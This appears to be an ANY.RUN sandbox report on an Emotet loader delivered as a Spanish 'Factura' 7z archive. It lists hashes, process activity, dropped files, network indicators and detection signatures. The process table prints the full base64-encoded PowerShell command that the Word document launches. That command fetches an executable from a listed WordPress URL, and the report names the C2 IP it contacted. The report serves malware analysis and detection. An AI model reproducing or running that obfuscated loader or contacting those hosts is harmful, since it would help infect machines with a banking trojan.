analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Factura _ HAS834685.7z

Full analysis: https://app.any.run/tasks/a8127302-7d15-4e91-b478-d17fc479a57e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: March 21, 2019, 20:49:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

E6C16FC121EE1CA12C7ABE3983552020

SHA1:

3D7A73416BE409F02A84FEDAA127D1EEB0B2111E

SHA256:

D4A0BCBF2508F697BD1568F22A12B4F8CC8BC1871ACBB7414FFC9922D0642A5A

SSDEEP:

1536:RT0SR+oaBRySe4S8ZVCEzXq6dw3ZTzElswg1DKgBUX++SdBcLCq:V/RpaBRiEV4j32Vg1mOUX+xsmq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 946.exe (PID: 304)
      • 946.exe (PID: 2524)
      • wabmetagen.exe (PID: 2556)
      • wabmetagen.exe (PID: 3152)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 4060)

    • Emotet process was detected

      • wabmetagen.exe (PID: 2556)

    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3152)

    • EMOTET was detected

      • wabmetagen.exe (PID: 3152)

    • Connects to CnC server

      • wabmetagen.exe (PID: 3152)

  • SUSPICIOUS

    • Application launched itself

      • 946.exe (PID: 304)
      • WinRAR.exe (PID: 688)
      • wabmetagen.exe (PID: 2556)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4060)
      • 946.exe (PID: 2524)

    • Creates files in the user directory

      • powershell.exe (PID: 4060)

    • Starts itself from another location

      • 946.exe (PID: 2524)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2440)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2440)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs winrar.exe no specs winword.exe no specs powershell.exe 946.exe no specs 946.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
688"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Factura _ HAS834685.7z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
888"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb688.42243\Factura _ HAS834685.zip"C:\Program Files\WinRAR\WinRAR.exeWinRAR.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2440"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Facture_Num_HAS834685.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4060powershell -e IAAoAG4ARQBXAC0ATwBiAEoAZQBjAFQAIAAgAEkAbwAuAEMAbwBNAFAAcgBlAFMAUwBJAG8ATgAuAEQAZQBmAGwAQQB0AEUAUwBUAFIARQBBAG0AKAAgAFsAcwB5AHMAVABlAE0ALgBpAE8ALgBNAEUATQBPAFIAeQBTAHQAUgBlAGEATQBdACAAWwBTAFkAcwBUAGUAbQAuAGMAbwBuAFYAZQBSAFQAXQA6ADoARgByAG8ATQBCAGEAcwBlADYANABTAFQAUgBJAG4ARwAoACgAJwBYAGQAQgAnACsAJwBiACcAKwAnAGEAOQBzAHcARgBBAEQAZwB2ACcAKwAnADYAJwArACcASQBIAGcAeABLAHkAVwBIAFUAeABoACcAKwAnAGQAVQAnACsAJwBZAGUAaABJAHoATAA5AEMAJwArACcATgAnACsAJwBtAHUAJwArACcARQAnACsAJwAxAG0ARQBHACcAKwAnAFEAJwArACcAbAAnACsAJwBlAE4ATAAnACsAJwA1AFUAJwArACcAagBHAFYAcQBvADAAJwArACcASQAnACsAJwBmACcAKwAnADkAOQBXAHQAWQBMAG0AOQAnACsAJwA2AE8AKwBNADcAVgAnACsAJwBFADcAQwAnACsAJwB3ACcAKwAnAE4AbwBPAFkAdABpAEYAcwAnACsAJwBiAEEAJwArACcAbwAnACsAJwBMACcAKwAnAEcAbgBrACcAKwAnAFcAZwBvAFcAQQBBAG0ASwBGAGQAcQA3AEwASgB4AFMARwAnACsAJwBmAEUAZgBqACcAKwAnAFAAMgAnACsAJwBLADUANwBGAHAAVQBKAHYASwBPAHkAMAB5ACcAKwAnAEsAeABLACcAKwAnAFUAMQB4AHYAUwAnACsAJwAzAGoAJwArACcARgBsACcAKwAnAHIAZgBWAEgAJwArACcAdQBlAEkAMQBLAHYAJwArACcAUABoACcAKwAnAEMANwA1ACcAKwAnAGoAdAA1ADAASQByADQAJwArACcAegAnACsAJwBSAEwAKwAzAFgAJwArACcANQBjACcAKwAnADgALwB1ACcAKwAnAC8AdAAnACsAJwBqAHgARgAnACsAJwBUACcAKwAnAGYAeQA2ACcAKwAnAHYAcgBtAEEAcQArAFAAJwArACcANAA5AE8AdQBsACcAKwAnAE0AeABXACcAKwAnADEAZgAnACsAJwBJAC8AJwArACcAdwA5AFcAMgAzAEwAZQBkADQAWAAnACsAJwAwAC8AJwArACcAWAB1ACcAKwAnAHcAZwAnACsAJwBxAHIAJwArACcASgBsAFgANwAnACsAJwArAEYAJwArACcAMwAnACsAJwBWAC8AJwArACcAcABZAE0AZQAnACsAJwBIAGQAaAAnACsAJwB4ADUAJwArACcAMwAnACsAJwAvAEIAJwArACcAaAB4AHkAJwArACcAKwBvADAAcQBWACcAKwAnAGkAJwArACcAOQAnACsAJwAyACcAKwAnAEQAJwArACcARgAnACsAJwB1ACcAKwAnADYAbABSAEQAegAnACsAJwBYACcAKwAnAEsAZABzACcAKwAnAFQAJwArACcAaAAnACsAJwBJACcAKwAnAGcAeQBPAGgAJwArACcAbQBWAG0AJwArACcAegBhACcAKwAnAGoAJwArACcALwAnACsAJwBvACsAOQBhAE0ANgBGADMAZAAnACsAJwBCACcAKwAnAHAANQBBACcAKwAnAEIAdAAnACsAJwBZAEwAJwArACcAeQBHAEkANgBUAEUAQgBBAE8AdABPAGMAUgAnACsAJwA4ACcAKwAnAFUARQBCAFEAawBKAHYAJwArACcAUgB6AGUATwBQAGkAJwArACcAcgBjADYATABKAEgAUgA3ACcAKwAnAEEANgBSAEoAJwArACcAbAB1ACcAKwAnAFgAdQBxACcAKwAnADAAOABGACcAKwAnAEIAJwArACcATwBzAHMAOQBsAEEAOQAnACsAJwAzACsANQBkACcAKwAnAGkAMwA3ACcAKwAnAFEAVgBkACcAKwAnAHYAaAAnACsAJwBqACcAKwAnAFAANgBpAHMAOQBjAEMAJwArACcATQArAHIAagBBACcAKwAnAFcAbAAnACsAJwBVADYAUQBHADUAYQAnACsAJwBDACcAKwAnAGEAZQBnAGwAeABxACcAKwAnAEMAVABsAHAAJwArACcARgBYAGsAJwArACcANwA1AHYAJwArACcAUgAnACsAJwBrACcAKwAnAGgAcABmACcAKwAnAFQAKwAnACsAJwAvACcAKwAnAFgAOQBSAEYAdgAnACsAJwBWAGEAYgA3ADkANABvAHAAOQAnACsAJwBaAEgAJwArACcAdwBpAGIAeAAzAGQAeABEAHcASgBvAEEAaABqAFcAbwAnACsAJwBnACcAKwAnAEEAJwArACcARABuAGwAYQAnACsAJwAwAEcAJwArACcAaABWAGsAYwAnACsAJwBrAGsAJwArACcAUgBUAE4AZgBHACcAKwAnAGQAeAA5ACcAKwAnAFUATAA5AEQAVgBaACcAKwAnAHUAJwArACcARwAnACsAJwB6AEcAJwArACcAcwBrACcAKwAnADQAWgBWADcAJwArACcAVQAzAEoAYQAnACsAJwBxAFcAYwB0ADgAVgA4ACcAKwAnAFkAZQBRACsANQBEAEUAJwArACcAQwAnACsAJwA0AEIAVQBOAFkAeQBBADIATgBTAGoAJwArACcAZQB4ACcAKwAnAGoAJwArACcATQA1AG4AdwBZADEAJwArACcAbwBUACcAKwAnAHUAZQB6ADkAJwArACcANQBoAEIAJwArACcAbgBzAGkAJwArACcAWQBwAHAARABEAEEAUQBTAE4AZgBnAE0APQAnACkAIAApACwAIABbAHMAWQBTAFQARQBNAC4AaQBPAC4AQwBvAE0AcABSAEUAcwBzAEkAbwBuAC4AYwBPAG0AcABSAGUAUwBzAEkATwBOAE0AbwBkAEUAXQA6ADoARABlAEMAbwBNAHAAcgBlAHMAUwApACAAfAAgAEYAbwByAEUAQQBjAGgALQBvAEIAagBlAEMAVAB7ACAAbgBFAFcALQBPAGIASgBlAGMAVAAgAGkAbwAuAHMAdABSAGUAQQBNAHIARQBhAGQARQByACgAJABfACAALABbAHQARQB4AFQALgBlAG4AQwBvAEQAaQBuAEcAXQA6ADoAYQBTAEMAaQBpACkAfQApAC4AcgBlAEEAZAB0AE8AZQBuAEQAKAApACAAfAAgACYAIAAoACAAJABTAGgAZQBMAEwASQBkAFsAMQBdACsAJABzAGgARQBsAGwASQBkAFsAMQAzAF0AKwAnAHgAJwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
304"C:\Users\admin\946.exe" C:\Users\admin\946.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2524--21281139C:\Users\admin\946.exe
946.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2556"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
946.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
3152--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Version:
8,6,0,1000
Total events
2 517
Read events
2 005
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR39FD.tmp.cvr
MD5:
SHA256:
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L18Y2XZAYA1875WJAIG8.temp
MD5:
SHA256:
2440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2528D0B4F435A69E0B33284300361C1A
SHA256:1F15076BA8E04BF318B428E992F9F2B609465E382B6F85831574B2801C050B72
688WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb688.42243\Factura _ HAS834685.zipcompressed
MD5:9BD31B86E55F83FC1C085289164F8788
SHA256:0A2C18CD03E99010DCAF952EE5D38C94EC2D1F85D41F07E0505214549CC6EAD6
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Facture_Num_HAS834685.doc.LNKlnk
MD5:6E94608624B24F3CC8BC343BE3400CC0
SHA256:542737B6B26C61EC3AB78F5B451C4875981F679A1E9EC89830F2CB7C897EA479
2440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:6C2E05CA89DC6F78E7D7A7BE2D231876
SHA256:FCE207C49BFAEBA635D616E1713F9A82B97C7B320892AFD7733B65ADA2D420F4
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF104b14.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2440WINWORD.EXEC:\Users\admin\Desktop\~$cture_Num_HAS834685.docpgc
MD5:997B8D59A298D963D9BECF3352BB1861
SHA256:6E7C2F2AB8452123ED817FE424DC129079DDE4827B59BF9F8F826024A17AB049
2524946.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:03072AD10291D3EE749CE3717511B35E
SHA256:D8851D8EE62CE7646344D49AC54F4C7008C27795177DD05E0534F809EF9FC8B8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4060
powershell.exe
GET
200
192.99.175.156:80
http://www.cbmagency.com/wp-content/GpXbVu/
CA
executable
352 Kb
suspicious
3152
wabmetagen.exe
POST
200
189.250.145.98:443
http://189.250.145.98:443/nsip/attrib/ringin/
MX
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3152
wabmetagen.exe
189.250.145.98:443
Uninet S.A. de C.V.
MX
malicious
4060
powershell.exe
192.99.175.156:80
www.cbmagency.com
OVH SAS
CA
suspicious

DNS requests

Domain
IP
Reputation
www.cbmagency.com
  • 192.99.175.156
suspicious

Threats

PID
Process
Class
Message
4060
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4060
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4060
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3152
wabmetagen.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Factura _ HAS834685.7z